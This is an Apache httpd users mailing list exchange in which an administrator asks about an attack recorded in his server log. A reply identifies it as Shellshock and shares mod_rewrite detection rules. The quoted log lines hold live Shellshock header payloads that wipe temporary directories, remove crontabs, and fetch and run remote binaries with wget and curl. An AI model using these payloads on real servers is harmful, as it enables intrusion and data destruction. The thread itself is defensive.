httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Victor Sterpu <vic...@casnt.ro>
Subject Re: [users@httpd] Security question
Date Fri, 03 Jul 2015 05:10:44 GMT
On 02.07.2015 17:55, Kurtis Rader wrote:
> On Thu, Jul 2, 2015 at 5:00 AM, Victor Sterpu <victor@casnt.ro 
> <mailto:victor@casnt.ro>> wrote:
>
>     A hacker attacked a apache2 web server by HTTP injection.
>     The log show what he has done:
>     62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET
>     /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl
>     -e 'print \"Content-Type:
>     text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/
>     ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf
>     /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download
>     b f r xx y i.gif print start pscan pnscan ps ; wget
>     http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ;
>     chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
>     How can I prevent this in the future and how can I reproduce?
>     I tried to reproduce but is not clear how he launched this command
>     and I want to know so I can test my vulnerabilities in the future.
>     The path "/phppath/cgi_wrapper" doesn't exist at all.
>
>
> That's a shellshock attack. I use the following rewrite rule to detect 
> them so my monitoring software can automatically block the source of 
> the attack. The /blocked.php script sets the HTTP status to 400.
>
> # This protects against attempts to exploit the Bash execution bug 
> (known as
> # "shellshock"). We're not susceptible to the attack but this makes it 
> easy to
> # spot the attack and blackhole the source. See
> # http://en.wikipedia.org/wiki/Shellshock_%28software_bug%29).
> RewriteCond %{QUERY_STRING} ^.*=\(\) [OR]
> RewriteCond %{HTTP_REFERER} ^\(\)\s{ [OR]
> RewriteCond %{HTTP_COOKIE} ^\(\)\s{ [OR]
> RewriteCond %{HTTP_USER_AGENT} ^\(\)\s{
> RewriteRule ^ /blocked.php [END,E=error-notes:shellshock-exploit]
> Here's the log entry for the most recent attack the above rule caught 
> (I have a custom log format):
>
> 2015-06-28T06:08:02 1435496882.639185 400 shellshock-exploit 6491 616 
> 194.8.18.88 75.101.21.75 "GET / HTTP/1.0" "() { :;}; /bin/bash -c 
> \"wget -O /tmp/bbb 
> dprftp.asuscomm.com/novo.php?ip=37352e3130312e32312e3735\ 
> <http://dprftp.asuscomm.com/novo.php?ip=37352e3130312e32312e3735%5C>""
>
>
> -- 
> Kurtis Rader
> Caretaker of the exceptional canines Junior and Hank

Thank you.

Mime
View raw message